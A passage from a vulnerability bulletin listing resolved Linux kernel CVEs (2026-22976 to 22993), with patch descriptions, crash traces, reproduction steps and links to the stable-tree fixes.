ffff8881043a0880 [ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000 [ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0 [ 0.910247] PKRU: 55555554 [ 0.910391] Call Trace: [ 0.910527] <TASK> [ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485) [ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036) [ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076) [ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447) [ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) [ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861) [ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550) [ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) [ 0.912296] ? __alloc_skb (net/core/skbuff.c:706) [ 0.912484] netlink_sendmsg (net/netlink/af ---truncated--- | 2026-01-21 | not yet calculated | CVE-2026-22976 | https://git.kernel.org/stable/c/6116a83ec167d3ab1390cded854d237481f41b63 https://git.kernel.org/stable/c/0809c4bc06c9c961222df29f2eccfd449304056f https://git.kernel.org/stable/c/cdb24200b043438a144df501f1ebbd926bb1a2c7 https://git.kernel.org/stable/c/11bf9134613f6c71fc0ff36c5d8d33856f6ae3bb https://git.kernel.org/stable/c/43497313d0da3e12b5cfcd97aa17bf48ee663f95 https://git.kernel.org/stable/c/51ffd447bc37bf1a5776b85523f51d2bc69977f6 https://git.kernel.org/stable/c/c1d73b1480235731e35c81df70b08f4714a7d095 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -> put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr->ee from skb->cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb->cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff <0f> 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] <TASK> [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2->cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719 | 2026-01-21 | not yet calculated | CVE-2026-22977 | https://git.kernel.org/stable/c/88dd6be7ebb3153b662c2cebcb06e032a92857f5 https://git.kernel.org/stable/c/c655d2167bf014d4c61b4faeca59b60ff9b9f6b1 https://git.kernel.org/stable/c/8c6901aa29626e35045130bac09b75f791acca85 https://git.kernel.org/stable/c/582a5e922a9652fcbb7d0165c95d5b20aa37575d https://git.kernel.org/stable/c/005671c60fcf1dbdb8bddf12a62568fd5e4ec391 https://git.kernel.org/stable/c/e00b169eaac5f7cdbf710c354c8fa76d02009115 https://git.kernel.org/stable/c/2a71a1a8d0ed718b1c7a9ac61f07e5755c47ae20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: avoid kernel-infoleak from struct iw_point struct iw_point has a 32bit hole on 64bit arches. struct iw_point { void __user *pointer; /* Pointer to the data (in user space) */ __u16 length; /* number of fields or size in bytes */ __u16 flags; /* Optional params */ }; Make sure to zero the structure to avoid disclosing 32bits of kernel data to user space. | 2026-01-23 | not yet calculated | CVE-2026-22978 | https://git.kernel.org/stable/c/d943b5f592767b107ba8c12a902f17431350378c https://git.kernel.org/stable/c/a3827e310b5a73535646ef4a552d53b3c8bf74f6 https://git.kernel.org/stable/c/442ceac0393185e9982323f6682a52a53e8462b1 https://git.kernel.org/stable/c/d21ec867d84c9f3a9845d7d8c90c9ce35dbe48f8 https://git.kernel.org/stable/c/024f71a57d563fbe162e528c8bf2d27e9cac7c7b https://git.kernel.org/stable/c/e3c35177103ead4658b8a62f41e3080d45885464 https://git.kernel.org/stable/c/21cbf883d073abbfe09e3924466aa5e0449e7261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix memory leak in skb_segment_list for GRO packets When skb_segment_list() is called during packet forwarding, it handles packets that were aggregated by the GRO engine. Historically, the segmentation logic in skb_segment_list assumes that individual segments are split from a parent SKB and may need to carry their own socket memory accounting. Accordingly, the code transfers truesize from the parent to the newly created segments. Prior to commit ed4cccef64c1 ("gro: fix ownership transfer"), this truesize subtraction in skb_segment_list() was valid because fragments still carry a reference to the original socket. However, commit ed4cccef64c1 ("gro: fix ownership transfer") changed this behavior by ensuring that fraglist entries are explicitly orphaned (skb->sk = NULL) to prevent illegal orphaning later in the stack. This change meant that the entire socket memory charge remained with the head SKB, but the corresponding accounting logic in skb_segment_list() was never updated. As a result, the current code unconditionally adds each fragment's truesize to delta_truesize and subtracts it from the parent SKB. Since the fragments are no longer charged to the socket, this subtraction results in an effective under-count of memory when the head is freed. This causes sk_wmem_alloc to remain non-zero, preventing socket destruction and leading to a persistent memory leak. The leak can be observed via KMEMLEAK when tearing down the networking environment: unreferenced object 0xffff8881e6eb9100 (size 2048): comm "ping", pid 6720, jiffies 4295492526 backtrace: kmem_cache_alloc_noprof+0x5c6/0x800 sk_prot_alloc+0x5b/0x220 sk_alloc+0x35/0xa00 inet6_create.part.0+0x303/0x10d0 __sock_create+0x248/0x640 __sys_socket+0x11b/0x1d0 Since skb_segment_list() is exclusively used for SKB_GSO_FRAGLIST packets constructed by GRO, the truesize adjustment is removed. The call to skb_release_head_state() must be preserved. As documented in commit cf673ed0e057 ("net: fix fraglist segmentation reference count leak"), it is still required to correctly drop references to SKB extensions that may be overwritten during __copy_skb_header(). | 2026-01-23 | not yet calculated | CVE-2026-22979 | https://git.kernel.org/stable/c/0b27828ebd1ed3107d7929c3737adbe862e99e74 https://git.kernel.org/stable/c/88bea149db2057112af3aaf63534b24fab5858ab https://git.kernel.org/stable/c/3264881431e308b9c72cb8a0159d57a56d67dd79 https://git.kernel.org/stable/c/c114a32a2e70b82d447f409f7ffcfa3058f9d5bd https://git.kernel.org/stable/c/238e03d0466239410b72294b79494e43d4fabe77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: provide locking for v4_end_grace Writing to v4_end_grace can race with server shutdown and result in memory being accessed after it was freed - reclaim_str_hashtbl in particularly. We cannot hold nfsd_mutex across the nfsd4_end_grace() call as that is held while client_tracking_op->init() is called and that can wait for an upcall to nfsdcltrack which can write to v4_end_grace, resulting in a deadlock. nfsd4_end_grace() is also called by the landromat work queue and this doesn't require locking as server shutdown will stop the work and wait for it before freeing anything that nfsd4_end_grace() might access. However, we must be sure that writing to v4_end_grace doesn't restart the work item after shutdown has already waited for it. For this we add a new flag protected with nn->client_lock. It is set only while it is safe to make client tracking calls, and v4_end_grace only schedules work while the flag is set with the spinlock held. So this patch adds a nfsd_net field "client_tracking_active" which is set as described. Another field "grace_end_forced", is set when v4_end_grace is written. After this is set, and providing client_tracking_active is set, the laundromat is scheduled. This "grace_end_forced" field bypasses other checks for whether the grace period has finished. This resolves a race which can result in use-after-free. | 2026-01-23 | not yet calculated | CVE-2026-22980 | https://git.kernel.org/stable/c/ca97360860eb02e3ae4ba42c19b439a0fcecbf06 https://git.kernel.org/stable/c/e8bfa2401d4c51eca6e48e9b33c798828ca9df61 https://git.kernel.org/stable/c/34eb22836e0cdba093baac66599d68c4cd245a9d https://git.kernel.org/stable/c/06600719d0f7a723811c45e4d51f5b742f345309 https://git.kernel.org/stable/c/ba4811c8b433bfa681729ca42cc62b6034f223b0 https://git.kernel.org/stable/c/53f07d095e7e680c5e4569a55a019f2c0348cdc6 https://git.kernel.org/stable/c/2857bd59feb63fcf40fe4baf55401baea6b4feb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: detach and close netdevs while handling a reset Protect the reset path from callbacks by setting the netdevs to detached state and close any netdevs in UP state until the reset handling has completed. During a reset, the driver will de-allocate resources for the vport, and there is no guarantee that those will recover, which is why the existing vport_ctrl_lock does not provide sufficient protection. idpf_detach_and_close() is called right before reset handling. If the reset handling succeeds, the netdevs state is recovered via call to idpf_attach_and_open(). If the reset handling fails the netdevs remain down. The detach/down calls are protected with RTNL lock to avoid racing with callbacks. On the recovery side the attach can be done without holding the RTNL lock as there are no callbacks expected at that point, due to detach/close always being done first in that flow. The previous logic restoring the netdevs state based on the IDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence the removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is still being used to restore the state of the netdevs following the reset, but has no use outside of the reset handling flow. idpf_init_hard_reset() is converted to void, since it was used as such and there is no error handling being done based on its return value. Before this change, invoking hard and soft resets simultaneously will cause the driver to lose the vport state: ip -br a <inf> UP echo 1 > /sys/class/net/ens801f0/device/reset& \ ethtool -L ens801f0 combined 8 ip -br a <inf> DOWN ip link set <inf> up ip -br a <inf> DOWN Also in case of a failure in the reset path, the netdev is left exposed to external callbacks, while vport resources are not initialized, leading to a crash on subsequent ifup/down: [408471.398966] idpf 0000:83:00.0: HW reset detected [408471.411744] idpf 0000:83:00.0: Device HW Reset initiated [408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device's firmware. Check that the FW is running. Driver state= 0x2 [408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078 [408508.126112] #PF: supervisor read access in kernel mode [408508.126687] #PF: error_code(0x0000) - not-present page [408508.127256] PGD 2aae2f067 P4D 0 [408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI ... [408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf] ... [408508.139193] Call Trace: [408508.139637] <TASK> [408508.140077] __dev_close_many+0xbb/0x260 [408508.140533] __dev_change_flags+0x1cf/0x280 [408508.140987] netif_change_flags+0x26/0x70 [408508.141434] dev_change_flags+0x3d/0xb0 [408508.141878] devinet_ioctl+0x460/0x890 [408508.142321] inet_ioctl+0x18e/0x1d0 [408508.142762] ? _copy_to_user+0x22/0x70 [408508.143207] sock_do_ioctl+0x3d/0xe0 [408508.143652] sock_ioctl+0x10e/0x330 [408508.144091] ? find_held_lock+0x2b/0x80 [408508.144537] __x64_sys_ioctl+0x96/0xe0 [408508.144979] do_syscall_64+0x79/0x3d0 [408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e [408508.145860] RIP: 0033:0x7f3e0bb4caff | 2026-01-23 | not yet calculated | CVE-2026-22981 | https://git.kernel.org/stable/c/ac122f5fb050903b3d262001562c452be95eaf70 https://git.kernel.org/stable/c/2e281e1155fc476c571c0bd2ffbfe28ab829a5c3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: Fix crash when adding interface under a lag Commit 15faa1f67ab4 ("lan966x: Fix crash when adding interface under a lag") fixed a similar issue in the lan966x driver caused by a NULL pointer dereference. The ocelot_set_aggr_pgids() function in the ocelot driver has similar logic and is susceptible to the same crash. This issue specifically affects the ocelot_vsc7514.c frontend, which leaves unused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as it uses the DSA framework which registers all ports. Fix this by checking if the port pointer is valid before accessing it. | 2026-01-23 | not yet calculated | CVE-2026-22982 | https://git.kernel.org/stable/c/8767f238b0e6c3d0b295ac6dce9fbe6a99bd1b9d https://git.kernel.org/stable/c/b17818307446c5a8d925a39a792261dbfa930041 https://git.kernel.org/stable/c/2985712dc76dfa670eb7fd607c09d4d48e5f5c6e https://git.kernel.org/stable/c/03fb1708b7d1e76aecebf767ad059c319845039f https://git.kernel.org/stable/c/f490af47bbee02441e356a1e0b86e3b3dd5120ff https://git.kernel.org/stable/c/34f3ff52cb9fa7dbf04f5c734fcc4cb6ed5d1a95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not write to msg_get_inq in callee NULL pointer dereference fix. msg_get_inq is an input field from caller to callee. Don't set it in the callee, as the caller may not clear it on struct reuse. This is a kernel-internal variant of msghdr only, and the only user does reinitialize the field. So this is not critical for that reason. But it is more robust to avoid the write, and slightly simpler code. And it fixes a bug, see below. Callers set msg_get_inq to request the input queue length to be returned in msg_inq. This is equivalent to but independent from the SO_INQ request to return that same info as a cmsg (tp->recvmsg_inq). To reduce branching in the hot path the second also sets the msg_inq. That is WAI. This is a fix to commit 4d1442979e4a ("af_unix: don't post cmsg for SO_INQ unless explicitly asked for"), which fixed the inverse. Also avoid NULL pointer dereference in unix_stream_read_generic if state->msg is NULL and msg->msg_get_inq is written. A NULL state->msg can happen when splicing as of commit 2b514574f7e8 ("net: af_unix: implement splice for stream af_unix sockets"). Also collapse two branches using a bitwise or. | 2026-01-23 | not yet calculated | CVE-2026-22983 | https://git.kernel.org/stable/c/ffa2be496ef65055b28b39c6bd9a7d66943ee89a https://git.kernel.org/stable/c/7d11e047eda5f98514ae62507065ac961981c025 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds reads in handle_auth_done() Perform an explicit bounds check on payload_len to avoid a possible out-of-bounds access in the callout. [ idryomov: changelog ] | 2026-01-23 | not yet calculated | CVE-2026-22984 | https://git.kernel.org/stable/c/194cfe2af4d2a1de599d39dad636b47c2f6c2c96 https://git.kernel.org/stable/c/79fe3511db416d2f2edcfd93569807cb02736e5e https://git.kernel.org/stable/c/ef208ea331ef688729f64089b895ed1b49e842e3 https://git.kernel.org/stable/c/2802ef3380fa8c4a08cda51ec1f085b1a712e9e2 https://git.kernel.org/stable/c/2d653bb63d598ae4b096dd678744bdcc34ee89e8 https://git.kernel.org/stable/c/818156caffbf55cb4d368f9c3cac64e458fb49c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations The RSS LUT is not initialized until the interface comes up, causing the following NULL pointer crash when ethtool operations like rxhash on/off are performed before the interface is brought up for the first time. Move RSS LUT initialization from ndo_open to vport creation to ensure LUT is always available. This enables RSS configuration via ethtool before bringing the interface up. Simplify LUT management by maintaining all changes in the driver's soft copy and programming zeros to the indirection table when rxhash is disabled. Defer HW programming until the interface comes up if it is down during rxhash and LUT configuration changes. Steps to reproduce: ** Load idpf driver; interfaces will be created modprobe idpf ** Before bringing the interfaces up, turn rxhash off ethtool -K eth2 rxhash off [89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000 [89408.371908] #PF: supervisor read access in kernel mode [89408.371924] #PF: error_code(0x0000) - not-present page [89408.371940] PGD 0 P4D 0 [89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI <snip> [89408.372052] RIP: 0010:memcpy_orig+0x16/0x130 [89408.372310] Call Trace: [89408.372317] <TASK> [89408.372326] ? idpf_set_features+0xfc/0x180 [idpf] [89408.372363] __netdev_update_features+0x295/0xde0 [89408.372384] ethnl_set_features+0x15e/0x460 [89408.372406] genl_family_rcv_msg_doit+0x11f/0x180 [89408.372429] genl_rcv_msg+0x1ad/0x2b0 [89408.372446] ? __pfx_ethnl_set_features+0x10/0x10 [89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10 [89408.372482] netlink_rcv_skb+0x58/0x100 [89408.372502] genl_rcv+0x2c/0x50 [89408.372516] netlink_unicast+0x289/0x3e0 [89408.372533] netlink_sendmsg+0x215/0x440 [89408.372551] __sys_sendto+0x234/0x240 [89408.372571] __x64_sys_sendto+0x28/0x30 [89408.372585] x64_sys_call+0x1909/0x1da0 [89408.372604] do_syscall_64+0x7a/0xfa0 [89408.373140] ? clear_bhb_loop+0x60/0xb0 [89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e [89408.378887] </TASK> <snip> | 2026-01-23 | not yet calculated | CVE-2026-22985 | https://git.kernel.org/stable/c/b29a5a7dd1f4293ee49c469938c25bf85a5aa802 https://git.kernel.org/stable/c/83f38f210b85676f40ba8586b5a8edae19b56995 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpiolib: fix race condition for gdev->srcu If two drivers were calling gpiochip_add_data_with_key(), one may be traversing the srcu-protected list in gpio_name_to_desc(), meanwhile other has just added its gdev in gpiodev_add_to_list_unlocked(). This creates a non-mutexed and non-protected timeframe, when one instance is dereferencing and using &gdev->srcu, before the other has initialized it, resulting in crash: [ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000 [ 4.943396] Mem abort info: [ 4.943400] ESR = 0x0000000096000005 [ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits [ 4.943407] SET = 0, FnV = 0 [ 4.943410] EA = 0, S1PTW = 0 [ 4.943413] FSC = 0x05: level 1 translation fault [ 4.943416] Data abort info: [ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000 [ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000 [ 4.961449] [ffff800272bcc000] pgd=0000000000000000 [ 4.969203] , p4d=1000000039739003 [ 4.979730] , pud=0000000000000000 [ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node "reset" [ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP ... [ 5.121359] pc : __srcu_read_lock+0x44/0x98 [ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0 [ 5.153671] sp : ffff8000833bb430 [ 5.298440] [ 5.298443] Call trace: [ 5.298445] __srcu_read_lock+0x44/0x98 [ 5.309484] gpio_name_to_desc+0x60/0x1a0 [ 5.320692] gpiochip_add_data_with_key+0x488/0xf00 5.946419] ---[ end trace 0000000000000000 ]--- Move initialization code for gdev fields before it is added to gpio_devices, with adjacent initialization code. Adjust goto statements to reflect modified order of operations [Bartosz: fixed a build issue, removed stray newline] | 2026-01-23 | not yet calculated | CVE-2026-22986 | https://git.kernel.org/stable/c/fb674c8f1a5d8dd3113a7326030f963fa2d79c02 https://git.kernel.org/stable/c/a7ac22d53d0990152b108c3f4fe30df45fcb0181 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_api: avoid dereferencing ERR_PTR in tcf_idrinfo_destroy syzbot reported a crash in tc_act_in_hw() during netns teardown where tcf_idrinfo_destroy() passed an ERR_PTR(-EBUSY) value as a tc_action pointer, leading to an invalid dereference. Guard against ERR_PTR entries when iterating the action IDR so teardown does not call tc_act_in_hw() on an error pointer. | 2026-01-23 | not yet calculated | CVE-2026-22987 | https://git.kernel.org/stable/c/67550a1130b647bb0d093c9c0a810c69aa6a30a8 https://git.kernel.org/stable/c/adb25a46dc0a43173f5ea5f5f58fc8ba28970c7c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arp: do not assume dev_hard_header() does not change skb->head arp_create() is the only dev_hard_header() caller making assumption about skb->head being unchanged. A recent commit broke this assumption. Initialize @arp pointer after dev_hard_header() call. | 2026-01-23 | not yet calculated | CVE-2026-22988 | https://git.kernel.org/stable/c/e432dbff342b95fe44645f9a90fcf333c80f4b5e https://git.kernel.org/stable/c/393525dee5c39acff8d6705275d7fcaabcfb7f0a https://git.kernel.org/stable/c/70bddc16491ef4681f3569b3a2c80309a3edcdd1 https://git.kernel.org/stable/c/029935507d0af6553c45380fbf6feecf756fd226 https://git.kernel.org/stable/c/dd6ccec088adff4bdf33e2b2dd102df20a7128fa https://git.kernel.org/stable/c/949647e7771a4a01963fe953a96d81fba7acecf3 https://git.kernel.org/stable/c/c92510f5e3f82ba11c95991824a41e59a9c5ed81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: check that server is running in unlock_filesystem If we are trying to unlock the filesystem via an administrative interface and nfsd isn't running, it crashes the server. This happens currently because nfsd4_revoke_states() access state structures (eg., conf_id_hashtbl) that has been freed as a part of the server shutdown. [ 59.465072] Call trace: [ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P) [ 59.465830] write_unlock_fs+0x258/0x440 [nfsd] [ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd] [ 59.466780] vfs_write+0x1f0/0x938 [ 59.467088] ksys_write+0xfc/0x1f8 [ 59.467395] __arm64_sys_write+0x74/0xb8 [ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8 [ 59.468177] do_el0_svc+0x154/0x1d8 [ 59.468489] el0_svc+0x40/0xe0 [ 59.468767] el0t_64_sync_handler+0xa0/0xe8 [ 59.469138] el0t_64_sync+0x1ac/0x1b0 Ensure this can't happen by taking the nfsd_mutex and checking that the server is still up, and then holding the mutex across the call to nfsd4_revoke_states(). | 2026-01-23 | not yet calculated | CVE-2026-22989 | https://git.kernel.org/stable/c/d95499900fe52f3d461ed26b7a30bebea8f12914 https://git.kernel.org/stable/c/e06c9f6c0f554148d4921c2a15bd054260a054ac https://git.kernel.org/stable/c/d0424066fcd294977f310964bed6f2a487fa4515 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() If the osdmap is (maliciously) corrupted such that the incremental osdmap epoch is different from what is expected, there is no need to BUG. Instead, just declare the incremental osdmap to be invalid. | 2026-01-23 | not yet calculated | CVE-2026-22990 | https://git.kernel.org/stable/c/9aa0b0c14cefece078286d78b97d4c09685e372d https://git.kernel.org/stable/c/4b106fbb1c7b841cd402abd83eb2447164c799ea https://git.kernel.org/stable/c/6afd2a4213524bc742b709599a3663aeaf77193c https://git.kernel.org/stable/c/d3613770e2677683e65d062da5e31f48c409abe9 https://git.kernel.org/stable/c/6c6cec3db3b418c4fdf815731bc39e46dff75e1b https://git.kernel.org/stable/c/6348d70af847b79805374fe628d3809a63fd7df3 https://git.kernel.org/stable/c/e00c3f71b5cf75681dbd74ee3f982a99cb690c2b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: make free_choose_arg_map() resilient to partial allocation free_choose_arg_map() may dereference a NULL pointer if its caller fails after a partial allocation. For example, in decode_choose_args(), if allocation of arg_map->args fails, execution jumps to the fail label and free_choose_arg_map() is called. Since arg_map->size is updated to a non-zero value before memory allocation, free_choose_arg_map() will iterate over arg_map->args and dereference a NULL pointer. To prevent this potential NULL pointer dereference and make free_choose_arg_map() more resilient, add checks for pointers before iterating. | 2026-01-23 | not yet calculated | CVE-2026-22991 | https://git.kernel.org/stable/c/9b3730dabcf3764bfe3ff07caf55e641a0b45234 https://git.kernel.org/stable/c/851241d3f78a5505224dc21c03d8692f530256b4 https://git.kernel.org/stable/c/ec1850f663da64842614c86b20fe734be070c2ba https://git.kernel.org/stable/c/8081faaf089db5280c3be820948469f7c58ef8dd https://git.kernel.org/stable/c/c4c2152a858c0ce4d2bff6ca8c1d5b0ef9f2cbdf https://git.kernel.org/stable/c/f21c3fdb96833aac2f533506899fe38c19cf49d5 https://git.kernel.org/stable/c/e3fe30e57649c551757a02e1cad073c47e1e075e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: return the handler error from mon_handle_auth_done() Currently any error from ceph_auth_handle_reply_done() is propagated via finish_auth() but isn't returned from mon_handle_auth_done(). This results in higher layers learning that (despite the monitor considering us to be successfully authenticated) something went wrong in the authentication phase and reacting accordingly, but msgr2 still trying to proceed with establishing the session in the background. In the case of secure mode this can trigger a WARN in setup_crypto() and later lead to a NULL pointer dereference inside of prepare_auth_signature(). | 2026-01-23 | not yet calculated | CVE-2026-22992 | https://git.kernel.org/stable/c/77229551f2cf72f3e35636db68e6a825b912cf16 https://git.kernel.org/stable/c/33908769248b38a5e77cf9292817bb28e641992d https://git.kernel.org/stable/c/e097cd858196b1914309e7e3d79b4fa79383754d https://git.kernel.org/stable/c/d2c4a5f6996683f287f3851ef5412797042de7f1 https://git.kernel.org/stable/c/9e0101e57534ef0e7578dd09608a6106736b82e5 https://git.kernel.org/stable/c/e84b48d31b5008932c0a0902982809fbaa1d3b70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: Fix RSS LUT NULL ptr issue after soft reset During soft reset, the RSS LUT is freed and not restored unless the interface is up. If an ethtool command that accesses the rss lut is attempted immediately after reset, it will result in NULL ptr dereference. Also, there is no need to reset the rss lut if the soft reset does not involve queue count change. After soft reset, set the RSS LUT to default values based on the updated queue count only if the reset was a result of a queue count change and the LUT was not configured by the user. In all other cases, don't touch the LUT. Steps to reproduce: ** Bring the interface down (if up) ifconfig eth1 down ** update the queue count (eg., 27->20) ethtool -L eth1 combined 20 ** display the RSS LUT ethtool -x eth1 [82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000 [82375.558373] #PF: supervisor read access in kernel mode [82375.558391] #PF: error_code(0x0000) - not-present page [82375.558408] PGD 0 P4D 0 [82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI <snip> [82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf] [82375.558786] Call Trace: [82375.558793] <TASK> [82375.558804] rss_prepare.isra.0+0x187/0x2a0 [82375.558827] rss_prepare_data+0x3a/0x50 [82375.558845] ethnl_default_doit+0x13d/0x3e0 [82375.558863] genl_family_rcv_msg_doit+0x11f/0x180 [82375.558886] genl_rcv_msg+0x1ad/0x2b0 [82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10 [82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10 [82375.558937] netlink_rcv_skb+0x58/0x100 [82375.558957] genl_rcv+0x2c/0x50 [82375.558971] netlink_unicast+0x289/0x3e0 [82375.558988] netlink_sendmsg+0x215/0x440 [82375.559005] __sys_sendto+0x234/0x240 [82375.559555] __x64_sys_sendto+0x28/0x30 [82375.560068] x64_sys_call+0x1909/0x1da0 [82375.560576] do_syscall_64+0x7a/0xfa0 [82375.561076] ? clear_bhb_loop+0x60/0xb0 [82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e <snip> | 2026-01-23 | not yet calculated | CVE-2026-22993 | https://git.kernel.org/stable/c/ab92fa4dd81beaaed4e93a851f7a37c9b2d9776f 